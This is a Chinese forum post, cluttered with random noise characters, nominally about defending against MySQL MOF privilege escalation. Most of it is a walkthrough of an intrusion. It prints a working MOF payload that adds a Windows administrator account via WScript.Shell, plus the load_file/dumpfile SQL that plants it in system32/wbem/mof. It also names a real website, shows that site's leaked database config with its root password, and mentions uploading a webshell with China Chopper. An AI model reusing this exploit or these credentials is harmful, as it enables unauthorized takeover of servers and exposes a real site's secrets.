Mysql mof扩展漏洞防范方法
0 {. B+ y6 R9 C0 ^' ^/ g' ?2 V' Q
5 P+ Q7 |' @- |$ ?1 [) n网上公开的一些利用代码:
, `7 M8 U* m6 Y- j/ \4 D G4 ]( p* ?3 H9 |6 }. ~
#pragma namespace(“\\\\.\\root\\subscription”)0 E& \6 C+ v! L; U4 p1 _( a, \! U
7 `( ^8 q. @' y; tinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };1 h W- M g2 t4 Z5 `5 ~8 D
/ g) y- p4 a/ j ) j! k: s* d+ [
, k! v4 x. M& |- f" ^
# h6 y S; X7 c4 a- ]: c! O1 [. ?. T8 n7 Z4 H
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
' s$ l( ~0 a( ~- A: e从上面代码来看得出解决办法:' E* f, `$ R& b7 T
9 _8 u/ \! s1 C( N
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数& E) F% I; b( B& P
; r( H t- b& f, q/ z2、禁止使用”WScript.Shel”组件
( w. J# t' k4 ]/ j/ j2 T) I$ ~
( P4 l' s, T2 n8 f- {- o3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER8 n$ G0 P4 L7 z; w% l
, X& z: u( r+ E; k) C7 k& _$ e+ k
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
$ w1 c/ n3 ^2 c; O. Q
5 u2 h4 x/ {$ `) N事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
+ x- }5 X# W5 ^/ G" a- ^
8 o1 i. `" s' j1 d但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容3 B! A: Q% d. ]( T- ^9 _8 u
; e* n0 s6 _) ?; N0 n" e0 W \- `看懂了后就开始练手吧' {* Q; j$ I7 u9 D
0 G& G/ J" [% g6 M& [http://www.webbmw.com/config/config_ucenter.php 一句话 a1 N; e' H5 V5 I1 Y2 t% \
6 n; u8 d8 A! W& n1 E* r$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。- o; a$ i' t: _$ f( K0 W
2 G/ k: C6 w! b5 [$ k
于是直接用菜刀开搞' c8 L* g* B X8 |1 @% H
" u4 Y1 ]$ ~( ]* A% `8 N2 K上马先
( p. |6 t" \; y p& W8 g) d; a4 r2 u1 g. s, `: B7 M# T" d
既然有了那些账号 之类的 于是我们就执行吧…….
4 c( c- [; f& J! s6 j1 f& C1 ~9 r6 {% v
小小的说下
8 r( ^$ H/ q5 t' V& T* j [% j6 z8 t& a/ h
在这里第1次执行未成功 原因未知" [9 v: u( D- B$ r1 r0 V/ d: N
; y3 U7 y9 f1 F# f" N& c我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
6 v0 t. {2 f7 y( k5 g# o; n# j6 J- x3 W
#pragma namespace(“\\\\.\\root\\subscription”)# ^0 j* x7 r- R4 Z# k
/ L6 I9 p/ y# V4 S" xinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
0 g# @" Z4 b& e7 _
% E p/ q; ?1 r$ r9 X我是将文件放到C:\WINDOWS\temp\1.mof
- E7 T) R: l% s8 Q" j" P
7 s9 e7 V3 s) u. ^, D( E! m1 f: q所以我们就改下执行的代码* `( H z# H `9 I/ F% F0 C" n( F
. y$ F# w6 S/ i9 ]5 uselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;. `& x3 S" o2 I* [" b
4 t3 u: R) d' ?; b* }2 [2 H) Y' ~" Y5 x
& l+ i; ] }2 M% x% {" H但是 你会发现账号还是没有躺在那里。。! P1 A0 E2 ^; C4 [! l. c1 i
4 ?( S, J9 I, b5 h' `3 K( x3 e
于是我就感觉蛋疼
4 q, o- ]1 p* @+ S( y( i/ ~! q+ W4 @. n; }1 }' k
就去一个一个去执行 但是执行到第2个 mysql时就成功了………0 g( V/ y/ X+ i' v; c
0 f% @, |* ^7 D
. }# J" D8 D! G C$ u& E7 x+ s! y3 F0 e$ A' X i0 L
但是其他库均不成功…
" U; V8 X+ ]4 c, a( p( n# q
( @% p+ P0 Q* C1 X3 k. ~我就很费解呀 到底为什么不成功求大牛解答… t, h3 U6 Y$ T7 F6 |
. l# f! V* }( n* K: S
1 p, k6 O, u5 ^/ l, n" C Q9 X; h% `2 I, n" N. v0 o. J
|